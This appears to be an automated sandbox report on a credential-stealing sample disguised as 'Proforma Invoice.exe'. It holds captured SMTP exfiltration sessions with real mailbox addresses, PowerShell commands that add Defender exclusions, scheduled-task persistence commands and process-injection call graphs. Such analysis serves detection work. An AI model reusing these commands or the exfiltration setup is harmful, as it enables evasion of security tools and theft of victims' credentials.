                                                                                                Feb 27, 2024 08:27:06.418896914 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:06.420070887 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.420135021 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.420169115 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.420203924 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:27:06.602018118 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:06.603281021 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:27:06.652070999 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:39.460927010 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:39.683779955 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:28:39.845330000 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:28:39.845398903 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:39.845464945 CET49736587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:40.029422045 CET5874973650.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:28:43.164463043 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:43.386923075 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:28:43.547872066 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 27, 2024 08:28:43.547946930 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:43.548003912 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 27, 2024 08:28:43.729939938 CET5874973950.87.139.143192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 27, 2024 08:26:57.697048903 CET5732153192.168.2.41.1.1.1
                                                                                                Feb 27, 2024 08:26:57.821093082 CET53573211.1.1.1192.168.2.4
                                                                                                Feb 27, 2024 08:26:59.442615032 CET6174453192.168.2.41.1.1.1
                                                                                                Feb 27, 2024 08:26:59.680124998 CET53617441.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Feb 27, 2024 08:26:57.697048903 CET192.168.2.41.1.1.10xfc01Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                Feb 27, 2024 08:26:59.442615032 CET192.168.2.41.1.1.10x580Standard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Feb 27, 2024 08:26:57.821093082 CET1.1.1.1192.168.2.40xfc01No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                Feb 27, 2024 08:26:57.821093082 CET1.1.1.1192.168.2.40xfc01No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                Feb 27, 2024 08:26:57.821093082 CET1.1.1.1192.168.2.40xfc01No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                Feb 27, 2024 08:26:59.680124998 CET1.1.1.1192.168.2.40x580No error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false
                                                                                                • api.ipify.org
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449734172.67.74.1524437372C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-02-27 07:26:58 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-02-27 07:26:58 UTC211INHTTP/1.1 200 OK
                                                                                                Date: Tue, 27 Feb 2024 07:26:58 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 85beb3de9f487ff1-IAD
                                                                                                2024-02-27 07:26:58 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                                                Data Ascii: 89.149.18.20


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449738172.67.74.1524437764C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-02-27 07:27:02 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-02-27 07:27:02 UTC211INHTTP/1.1 200 OK
                                                                                                Date: Tue, 27 Feb 2024 07:27:02 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 85beb3f8cfbd878c-IAD
                                                                                                2024-02-27 07:27:02 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                                                Data Ascii: 89.149.18.20


                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                Feb 27, 2024 08:27:01.847554922 CET5874973650.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 00:27:01 -0700
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
                                                                                                Feb 27, 2024 08:27:01.847775936 CET49736587192.168.2.450.87.139.143EHLO 609290
                                                                                                Feb 27, 2024 08:27:02.031174898 CET5874973650.87.139.143192.168.2.4250-box2248.bluehost.com Hello 609290 [89.149.18.20]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPECONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
                                                                                                Feb 27, 2024 08:27:02.032288074 CET49736587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                                                Feb 27, 2024 08:27:02.215349913 CET5874973650.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                                Feb 27, 2024 08:27:02.512758017 CET5874973650.87.139.143192.168.2.4235 Authentication succeeded
                                                                                                Feb 27, 2024 08:27:02.513128042 CET49736587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                                                Feb 27, 2024 08:27:02.695775986 CET5874973650.87.139.143192.168.2.4250 OK
                                                                                                Feb 27, 2024 08:27:02.696296930 CET49736587192.168.2.450.87.139.143RCPT TO:<richcompaniesltd@gmail.com>
                                                                                                Feb 27, 2024 08:27:02.918858051 CET5874973650.87.139.143192.168.2.4250 Accepted
                                                                                                Feb 27, 2024 08:27:02.919197083 CET49736587192.168.2.450.87.139.143DATA
                                                                                                Feb 27, 2024 08:27:03.102018118 CET5874973650.87.139.143192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                Feb 27, 2024 08:27:03.102803946 CET49736587192.168.2.450.87.139.143.
                                                                                                Feb 27, 2024 08:27:03.287079096 CET5874973650.87.139.143192.168.2.4250 OK id=1rerrj-000tNz-02
                                                                                                Feb 27, 2024 08:27:05.277101994 CET5874973950.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 00:27:05 -0700
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
                                                                                                Feb 27, 2024 08:27:05.277499914 CET49739587192.168.2.450.87.139.143EHLO 609290
                                                                                                Feb 27, 2024 08:27:05.460086107 CET5874973950.87.139.143192.168.2.4250-box2248.bluehost.com Hello 609290 [89.149.18.20]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPECONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
                                                                                                Feb 27, 2024 08:27:05.460613966 CET49739587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                                                Feb 27, 2024 08:27:05.643049955 CET5874973950.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                                Feb 27, 2024 08:27:05.831377983 CET5874973950.87.139.143192.168.2.4235 Authentication succeeded
                                                                                                Feb 27, 2024 08:27:05.834887028 CET49739587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                                                Feb 27, 2024 08:27:06.016946077 CET5874973950.87.139.143192.168.2.4250 OK
                                                                                                Feb 27, 2024 08:27:06.017261982 CET49739587192.168.2.450.87.139.143RCPT TO:<richcompaniesltd@gmail.com>
                                                                                                Feb 27, 2024 08:27:06.236444950 CET5874973950.87.139.143192.168.2.4250 Accepted
                                                                                                Feb 27, 2024 08:27:06.236768961 CET49739587192.168.2.450.87.139.143DATA
                                                                                                Feb 27, 2024 08:27:06.418896914 CET5874973950.87.139.143192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                Feb 27, 2024 08:27:06.420203924 CET49739587192.168.2.450.87.139.143.
                                                                                                Feb 27, 2024 08:27:06.603281021 CET5874973950.87.139.143192.168.2.4250 OK id=1rerrm-000tQv-13
                                                                                                Feb 27, 2024 08:28:39.460927010 CET49736587192.168.2.450.87.139.143QUIT
                                                                                                Feb 27, 2024 08:28:39.845330000 CET5874973650.87.139.143192.168.2.4221 box2248.bluehost.com closing connection
                                                                                                Feb 27, 2024 08:28:43.164463043 CET49739587192.168.2.450.87.139.143QUIT
                                                                                                Feb 27, 2024 08:28:43.547872066 CET5874973950.87.139.143192.168.2.4221 box2248.bluehost.com closing connection

                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:08:26:53
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                Imagebase:0x120000
                                                                                                File size:737'288 bytes
                                                                                                MD5 hash:B774CA62D4F7E4A8359A40C7CAD50DDB
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                Imagebase:0xaf0000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                Imagebase:0xaf0000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp
                                                                                                Imagebase:0x4b0000
                                                                                                File size:187'904 bytes
                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:08:26:55
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                Imagebase:0xba0000
                                                                                                File size:737'288 bytes
                                                                                                MD5 hash:B774CA62D4F7E4A8359A40C7CAD50DDB
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:9
                                                                                                Start time:08:26:56
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                Imagebase:0x7f0000
                                                                                                File size:737'288 bytes
                                                                                                MD5 hash:B774CA62D4F7E4A8359A40C7CAD50DDB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 63%, ReversingLabs
                                                                                                • Detection: 65%, Virustotal, Browse
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:08:26:57
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:08:27:00
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp
                                                                                                Imagebase:0x4b0000
                                                                                                File size:187'904 bytes
                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:08:27:00
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:08:27:00
                                                                                                Start date:27/02/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                Imagebase:0x750000
                                                                                                File size:737'288 bytes
                                                                                                MD5 hash:B774CA62D4F7E4A8359A40C7CAD50DDB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.1%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:221
                                                                                                  Total number of Limit Nodes:14
                                                                                                  execution_graph 29912 b84668 29913 b84672 29912->29913 29915 b84778 29912->29915 29916 b8479d 29915->29916 29920 b84888 29916->29920 29924 b84877 29916->29924 29921 b848af 29920->29921 29923 b8498c 29921->29923 29928 b845a4 29921->29928 29925 b848af 29924->29925 29926 b8498c 29925->29926 29927 b845a4 CreateActCtxA 29925->29927 29926->29926 29927->29926 29929 b85d18 CreateActCtxA 29928->29929 29931 b85ddb 29929->29931 29932 50bd890 29933 50bda50 29932->29933 29936 50bd8b6 29932->29936 29934 50bda1b 29934->29934 29936->29934 29937 50ba6d4 29936->29937 29938 50bdb10 PostMessageW 29937->29938 29939 50bdb7c 29938->29939 29939->29936 29663 50b9787 29664 50b983e 29663->29664 29665 50b9791 29663->29665 29670 50bc6de 29665->29670 29689 50bc680 29665->29689 29707 50bc672 29665->29707 29725 50bc67c 29665->29725 29671 50bc66c 29670->29671 29673 50bc6e1 29670->29673 29672 50bc6be 29671->29672 29743 50bcbe9 29671->29743 29756 50bcdb4 29671->29756 29761 50bcaf1 29671->29761 29765 50bcd33 29671->29765 29771 50bd013 29671->29771 29776 50bcedc 29671->29776 29782 50bcc7c 29671->29782 29791 50bcf64 29671->29791 29800 50bd086 29671->29800 29805 50bcb46 29671->29805 29814 50bd1c1 29671->29814 29818 50bd161 29671->29818 29824 50bcec3 29671->29824 29837 50bce8c 29671->29837 29843 50bccac 29671->29843 29672->29664 29673->29664 29690 50bc69a 29689->29690 29691 50bc6be 29690->29691 29692 50bcbe9 7 API calls 29690->29692 29693 50bccac 4 API calls 29690->29693 29694 50bce8c 3 API calls 29690->29694 29695 50bcec3 7 API calls 29690->29695 29696 50bd161 2 API calls 29690->29696 29697 50bd1c1 2 API calls 29690->29697 29698 50bcb46 4 API calls 29690->29698 29699 50bd086 2 API calls 29690->29699 29700 50bcf64 4 API calls 29690->29700 29701 50bcc7c 4 API calls 29690->29701 29702 50bcedc 3 API calls 29690->29702 29703 50bd013 2 API calls 29690->29703 29704 50bcd33 3 API calls 29690->29704 29705 50bcaf1 2 API calls 29690->29705 29706 50bcdb4 3 API calls 29690->29706 29691->29664 29692->29691 29693->29691 29694->29691 29695->29691 29696->29691 29697->29691 29698->29691 29699->29691 29700->29691 29701->29691 29702->29691 29703->29691 29704->29691 29705->29691 29706->29691 29708 50bc67a 29707->29708 29709 50bcbe9 7 API calls 29708->29709 29710 50bccac 4 API calls 29708->29710 29711 50bce8c 3 API calls 29708->29711 29712 50bcec3 7 API calls 29708->29712 29713 50bd161 2 API calls 29708->29713 29714 50bd1c1 2 API calls 29708->29714 29715 50bc6be 29708->29715 29716 50bcb46 4 API calls 29708->29716 29717 50bd086 2 API calls 29708->29717 29718 50bcf64 4 API calls 29708->29718 29719 50bcc7c 4 API calls 29708->29719 29720 50bcedc 3 API calls 29708->29720 29721 50bd013 2 API calls 29708->29721 29722 50bcd33 3 API calls 29708->29722 29723 50bcaf1 2 API calls 29708->29723 29724 50bcdb4 3 API calls 29708->29724 29709->29715 29710->29715 29711->29715 29712->29715 29713->29715 29714->29715 29715->29664 29716->29715 29717->29715 29718->29715 29719->29715 29720->29715 29721->29715 29722->29715 29723->29715 29724->29715 29726 50bc680 29725->29726 29727 50bc6be 29726->29727 29728 50bcbe9 7 API calls 29726->29728 29729 50bccac 4 API calls 29726->29729 29730 50bce8c 3 API calls 29726->29730 29731 50bcec3 7 API calls 29726->29731 29732 50bd161 2 API calls 29726->29732 29733 50bd1c1 2 API calls 29726->29733 29734 50bcb46 4 API calls 29726->29734 29735 50bd086 2 API calls 29726->29735 29736 50bcf64 4 API calls 29726->29736 29737 50bcc7c 4 API calls 29726->29737 29738 50bcedc 3 API calls 29726->29738 29739 50bd013 2 API calls 29726->29739 29740 50bcd33 3 API calls 29726->29740 29741 50bcaf1 2 API calls 29726->29741 29742 50bcdb4 3 API calls 29726->29742 29727->29664 29728->29727 29729->29727 29730->29727 29731->29727 29732->29727 29733->29727 29734->29727 29735->29727 29736->29727 29737->29727 29738->29727 29739->29727 29740->29727 29741->29727 29742->29727 29744 50bcc03 29743->29744 29745 50bcc40 29744->29745 29867 50b89fc 29744->29867 29871 50b89f8 29744->29871 29875 50b8a00 29744->29875 29745->29672 29746 50bcb52 29746->29745 29851 50b8fb8 29746->29851 29855 50b8fc0 29746->29855 29747 50bcccd 29859 50b9080 29747->29859 29863 50b9078 29747->29863 29748 50bd13f 29879 50b8ab0 29756->29879 29883 50b8aac 29756->29883 29887 50b8aa8 29756->29887 29757 50bcdce 29891 50b9308 29761->29891 29895 50b92fc 29761->29895 29766 50bcd39 29765->29766 29900 50b9168 29766->29900 29904 50b9170 29766->29904 29908 50b916c 29766->29908 29767 50bccf4 29767->29672 29773 50bd019 29771->29773 29772 50bd13f 29774 50b9078 WriteProcessMemory 29773->29774 29775 50b9080 WriteProcessMemory 29773->29775 29774->29772 29775->29772 29777 50bd301 29776->29777 29779 50b8aa8 Wow64SetThreadContext 29777->29779 29780 50b8aac Wow64SetThreadContext 29777->29780 29781 50b8ab0 Wow64SetThreadContext 29777->29781 29778 50bd31c 29779->29778 29780->29778 29781->29778 29783 50bcb52 29782->29783 29784 50bcc40 29783->29784 29785 50bcccd 29783->29785 29787 50b8fb8 VirtualAllocEx 29783->29787 29788 50b8fc0 VirtualAllocEx 29783->29788 29784->29672 29789 50b9078 WriteProcessMemory 29785->29789 29790 50b9080 WriteProcessMemory 29785->29790 29786 50bd13f 29786->29786 29787->29785 29788->29785 29789->29786 29790->29786 29792 50bcb52 29791->29792 29793 50bcc40 29792->29793 29798 50b8fb8 VirtualAllocEx 29792->29798 29799 50b8fc0 VirtualAllocEx 29792->29799 29793->29672 29794 50bcccd 29796 50b9078 WriteProcessMemory 29794->29796 29797 50b9080 WriteProcessMemory 29794->29797 29795 50bd13f 29796->29795 29797->29795 29798->29794 29799->29794 29803 50b9078 WriteProcessMemory 29800->29803 29804 50b9080 WriteProcessMemory 29800->29804 29801 50bd007 29801->29800 29802 50bcbbe 29801->29802 29803->29801 29804->29801 29806 50bcb52 29805->29806 29808 50bcc40 29806->29808 29812 50b8fb8 VirtualAllocEx 29806->29812 29813 50b8fc0 VirtualAllocEx 29806->29813 29807 50bcccd 29810 50b9078 WriteProcessMemory 29807->29810 29811 50b9080 WriteProcessMemory 29807->29811 29808->29672 29809 50bd13f 29809->29809 29810->29809 29811->29809 29812->29807 29813->29807 29816 50b9078 WriteProcessMemory 29814->29816 29817 50b9080 WriteProcessMemory 29814->29817 29815 